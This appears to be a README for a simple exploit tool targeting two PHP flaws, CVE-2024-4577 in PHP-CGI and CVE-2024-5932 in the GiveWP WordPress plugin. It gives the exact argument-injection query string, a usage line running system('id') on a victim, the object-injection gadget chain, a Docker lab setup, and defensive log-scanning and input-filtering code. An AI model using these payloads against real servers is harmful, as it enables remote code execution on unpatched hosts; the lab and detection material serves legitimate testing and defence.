A tool similar to Metasploit (but far simpler), containing 2 PHP exploits and executing them. We don't implement a GUI.

- Exploring 2 different PHP vulnerabilities
- System and PHP version detection
- Exploitation
- Good webshell or possibility to run shellcode
- Docker containers usage for testing
This Python PoC abuses PHP-CGI's argument parsing (CVE-2024-4577) to get RCE in two steps:

- Flag injection: it appends `?%ADd+allow_url_include=1+-d+auto_prepend_file=php://input` to the URL to trick PHP-CGI into including whatever is sent in the request body.
- Payload delivery: the attacker's PHP snippet (e.g. ) is sent in a POST to that URL, runs immediately, and echoes a marker (1337) to confirm success.

Run it like:

```
python exploit.py --target http://victim/index.php \
    --code "<?php system('id'); ?>"
```

- The system locale has to be set to Japanese or Chinese, otherwise the exploit will not work.
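As an added detection example (not part of this project's code), the following Python scans web-server access-log lines for the request shape the PoC above relies on: a percent-encoded soft hyphen (byte 0xAD) directly followed by an option letter, which an affected PHP-CGI reads as a CLI switch, plus the ini directives pushed through `-d`. The log lines are constructed samples in Common Log Format; the function and variable names are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines in Common Log Format (not from a real server).
# Line 1 mimics the query string used in the PoC above, line 3 uses a different
# option letter after the soft hyphen, line 2 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "POST /index.php?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /cgi-bin/php-cgi.exe?%ads+ HTTP/1.1" 200 128
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Byte 0xAD (soft hyphen) directly followed by a letter. On an affected Windows
# locale PHP-CGI best-fit-maps that byte to '-', so "%ADd" is read as the option "-d".
OPTION_INJECTION_RE = re.compile(rb"\xad[A-Za-z]")

# ini directives the PoC pushes through "-d"; seeing them in a query string is a
# strong signal on its own, whatever the locale.
INI_DIRECTIVES = (b"allow_url_include", b"auto_prepend_file")


def suspicious_query(query: str) -> list[str]:
    """Return the reasons a query string looks like a CVE-2024-4577 attempt (empty if none)."""
    raw = unquote_to_bytes(query)  # percent-decode to bytes so the 0xAD byte is visible
    reasons = []
    if OPTION_INJECTION_RE.search(raw):
        reasons.append("soft-hyphen option injection")
    lowered = raw.lower()
    reasons.extend(d.decode() for d in INI_DIRECTIVES if d in lowered)
    return reasons


def scan_access_log(text: str) -> list[dict]:
    """Scan CLF access-log text and report requests whose query string is suspicious."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        query = target.partition("?")[2]
        reasons = suspicious_query(query) if query else []
        if reasons:
            findings.append({"line": lineno, "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['target']}  <- {', '.join(f['reasons'])}")
```

Decoding to bytes rather than to text matters: the soft hyphen only becomes a hyphen after PHP-CGI's own conversion, so a detector that decodes `%AD` as a Unicode character may normalise it away. On the mitigation side, the vendor fix for this CVE is in the patched PHP releases; the rule above is for spotting attempts against hosts that are still running an affected build.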
CVE-2024-5932 is a critical PHP Object Injection flaw in the GiveWP – Donation Plugin and Fundraising Platform (WordPress), affecting all versions through 3.14.1. The vulnerability stems from unsafe deserialization of the `give_title` parameter, allowing an attacker to inject a crafted PHP object chain. By embedding a reference to `shell_exec` inside the payload, an unauthenticated attacker can execute arbitrary system commands or delete files on the server.

The sole exploit file is `CVE20245932rce.py`, which operates as follows:

- It retrieves the donation page, uses BeautifulSoup to extract the hidden form fields (`give-form-id`, `give-form-hash`, `give-price-id`, donation amount) and generates fake donor data via Faker.
- It builds a serialized PHP object chain (`Stripe\StripeObject` → `GiveInsertPaymentData` → `Give` → `ValidGenerator`) with the `validator` property set to `shell_exec("")`, where "" can be a file path or a system command.
- It sends a POST request to `/wp-admin/admin-ajax.php` with `give_title=`, forcing GiveWP to deserialize and immediately execute the embedded command.

Version 3.14.2 of GiveWP adds proper sanitization for `give_title`, preventing this exploit.
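As an added defensive example (not part of this project's code and not the plugin's own fix), the following Python shows the check a request-inspection rule or a server-side filter can apply to form parameters that should only ever hold plain text, such as `give_title`: it lists the class names of any PHP serialized objects embedded in a parameter and rejects titles that look like serialized data at all. The request body is a constructed stand-in with a harmless `stdClass` object, not captured traffic and not the gadget chain described above; all function names are this example's own.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Constructed form body (not captured traffic): benign donation fields plus one
# parameter carrying a harmless serialized stdClass object as a stand-in payload.
CONSTRUCTED_BODY = "&".join([
    "action=give_process_donation",
    "give-form-id=42",
    "give_title=" + quote_plus('O:8:"stdClass":1:{s:4:"name";s:7:"example";}'),
    "give-email=" + quote_plus("donor@example.test"),
])

# A PHP serialized object header: O:<name length>:"<class name>":<property count>:{
SERIALIZED_OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":\d+:\{')

# Leading token of any PHP serialized value we refuse outright: object, custom, array.
SERIALIZED_START_RE = re.compile(r"^\s*[OCa]:\d+:")


def serialized_classes(value: str) -> list[str]:
    """Return class names of PHP serialized objects found anywhere in value.

    Only headers whose declared length matches the class-name length count, which
    weeds out ordinary text that merely happens to contain 'O:'.
    """
    return [name for length, name in SERIALIZED_OBJECT_RE.findall(value)
            if int(length) == len(name)]


def parse_form_body(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body (splits on '&' only)."""
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, val = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(val)
    return params


def scan_post_body(body: str) -> dict[str, list[str]]:
    """Map each parameter that carries serialized PHP objects to the classes it names."""
    found = {}
    for key, val in parse_form_body(body).items():
        classes = serialized_classes(val)
        if classes:
            found[key] = classes
    return found


def is_acceptable_title(value: str) -> bool:
    """Accept a title only if it is plain text with no serialized-PHP structure in it."""
    if SERIALIZED_START_RE.match(value):
        return False
    return not serialized_classes(value)


if __name__ == "__main__":
    for param, classes in scan_post_body(CONSTRUCTED_BODY).items():
        print(f"{param}: serialized object(s) {classes}")
    print("title accepted:", is_acceptable_title(parse_form_body(CONSTRUCTED_BODY)["give_title"]))
```

`parse_form_body` splits on `&` only, because `;` is a structural character inside PHP serialized strings and a parser that also treats it as a pair separator would cut the payload apart and miss the object headers. `is_acceptable_title` is the allowlist side of the same idea: a title never legitimately starts with a serialization token, so rejecting the shape is simpler and safer than trying to strip dangerous classes.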
- docker-compose.yml:

```yaml
services:
  db:
    image: mysql:8.0.27
    command: '--default-authentication-plugin=mysql_native_password'
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=somewordpress
      - MYSQL_DATABASE=wordpress
      - MYSQL_USER=wordpress
      - MYSQL_PASSWORD=wordpress
    expose:
      - 3306
      - 33060
    volumes:
      # mounts the db_data volume declared below (added here; the original declared the volume but mounted it nowhere)
      - db_data:/var/lib/mysql
  wordpress:
    image: wordpress:6.3.2
    ports:
      - 80:80
    restart: always
    environment:
      - WORDPRESS_DB_HOST=db
      - WORDPRESS_DB_USER=wordpress
      - WORDPRESS_DB_PASSWORD=wordpress
      - WORDPRESS_DB_NAME=wordpress
volumes:
  db_data:
```
- Then download the vulnerable GiveWP plugin: https://downloads.wordpress.org/plugin/give.3.14.1.zip
- Unzip it to the `wp-content/plugins` directory of your WordPress installation:

  ```
  docker cp give docker-wordpress-1:/var/www/html/wp-content/plugins
  ```

- Activate the GiveWP plugin
- Add a new post with the GiveWP plugin and copy the post link
- Check the vulnerable link
- Run the exploit, for example:

  ```
  python3 main.py -u http://localhost/
  ```

  Example session:

  ```
  Give full url for givewp plugin form:
  http://localhost/donations/test-form/
  Command to run:
  touch /tmp/test.txt
  ```